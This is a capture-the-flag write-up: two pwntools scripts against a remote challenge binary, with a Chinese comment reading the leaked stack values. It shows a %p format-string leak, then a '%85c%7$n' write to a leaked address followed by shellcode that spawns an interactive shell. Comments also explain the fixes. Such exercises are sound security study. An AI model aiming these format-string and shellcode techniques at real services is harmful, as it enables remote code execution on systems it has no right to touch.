from pwn import *

# Probe run against the CTF service: walks the menu and sends a marker
# ('AAAA') followed by ten %p conversions as the "wish".  If the reply echoes
# stack words instead of the literal text, the program is using user input as
# a printf-style format string.  On the program side the fix is to print with
# a constant format (printf("%s", buf)); -Wformat -Wformat-security flags the
# pattern at compile time.

HOST = '111.200.241.244'
PORT = 62322

conn = remote(HOST, PORT)
context(arch='amd64', os='linux', log_level='debug')

# The banner prints a hex value after "secret[0] is "; the script later sends
# it back as an address, so it is presumably the address of secret[0].
conn.recvuntil('secret[0] is ')
banner_hex = conn.recvuntil('\n')[:-1]   # drop the trailing newline
v4_addr = int(banner_hex, 16)

# Fixed answers that lead to the two interesting prompts.
menu_steps = (
    ("What should your character's name be:", 'cxk'),
    ("So, where you will go?east or up?:", 'east'),
    ("go into there(1), or leave(0)?:", '1'),
    # The address is sent back in decimal text.
    ("'Give me an address'", str(v4_addr)),
    # Marker plus ten pointer-sized dumps, '-' separated for readability.
    ("And, you wish is:", 'AAAA' + '-%p' * 10),
)
for prompt, answer in menu_steps:
    conn.sendlineafter(prompt, answer)

# Stop once the echoed "wish" (with the expanded %p values) has arrived.
conn.recvuntil('I hear it')
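我们观察返回来的数据(第 8 个值 0x2d70252d41414141 按小端序正是输入的 "AAAA-%p-",说明格式化字符串缓冲区从第 8 个参数开始;第 7 个值 0x22ea010 应为上一步输入的地址,可对照 debug 日志确认):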
AAAA-0x7f3cf04206a3-0x7f3cf0421780-0x7f3cf01522c0-0x7f3cf0648700-0x7f3cf0648700-0x100000022-0x22ea010-0x2d70252d41414141-0x70252d70252d7025-0x252d70252d70252dI hear it, I hear it…\n’
from pwn import *

# Final run against the same CTF service.  Same menu walk as the probe, but
# the "wish" is now '%85c%7$n': %85c pads the output to 85 characters and
# %7$n stores that count through the pointer found in argument slot 7, the
# slot that held 0x22ea010 in the probe output (presumably the address sent
# at the previous prompt -- confirm against the debug log).
#
# NOTE(review): the binary is not shown on this page.  The script implies that
# it checks the written value and then runs the bytes received at the last
# prompt; verify against the disassembly.
#
# What the program should have done: print user text with a constant format
# string, and never execute a buffer filled from input.  glibc built with
# _FORTIFY_SOURCE=2 also aborts on %n in a writable format string.

HOST = "111.200.241.244"
PORT = "62322"   # passed as a string, exactly as in the original script

conn = remote(HOST, PORT)
context(arch='amd64', os='linux', log_level='debug')

# The banner prints a hex value after "secret[0] is "; it is echoed back as
# the target address below.
conn.recvuntil('secret[0] is ')
banner_hex = conn.recvuntil('\n')[:-1]   # drop the trailing newline
v4_addr = int(banner_hex, 16)

menu_steps = (
    ("What should your character's name be:", 'cxk'),
    ("So, where you will go?east or up?:", 'east'),
    ("go into there(1), or leave(0)?:", '1'),
    # The address is sent back in decimal text.
    ("'Give me an address'", str(v4_addr)),
    # Write the value 85 through the pointer in argument slot 7.
    ("And, you wish is:", '%85c%7$n'),
)
for prompt, answer in menu_steps:
    conn.sendlineafter(prompt, answer)

# context(arch='amd64') above selects the 64-bit Linux shellcraft template.
shellcode = asm(shellcraft.sh())
conn.sendlineafter("USE YOU SPELL", shellcode)

conn.interactive()